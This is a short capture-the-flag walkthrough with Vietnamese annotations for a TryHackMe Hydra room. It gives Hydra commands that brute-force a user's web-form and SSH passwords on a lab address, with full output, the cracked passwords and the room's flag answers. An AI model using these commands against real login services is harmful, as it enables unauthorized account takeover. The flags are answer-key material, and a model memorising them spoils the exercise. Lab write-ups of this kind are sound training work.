Info
Lý thuyết: Hydra.
Use Hydra to Bruteforce Molly’s Web Password. What is Flag 1?
Sử dụng câu lệnh sau:
sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.67.3 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
Output:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-25 12:01:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.67.3:80/login:username=^USER^&password=^PASS^:F=incorrect
[80][http-post-form] host: 10.10.67.3 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-25 12:01:56
Đăng nhập vào và thu được flag.
Success
THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to Bruteforce Molly’s SSH Password. What is Flag 2?
Sử dụng câu lệnh sau:
sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.67.3 ssh ─╯
Output:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-25 12:05:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.67.3:22/
[22][ssh] host: 10.10.67.3 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-25 12:05:32
Đăng nhập vào và thu được flag:
Success
THM{c8eeb0468febbadea859baeb33b2541b}
Related
list
from outgoing([[Tryhackme - Hydra]])
sort file.ctime asc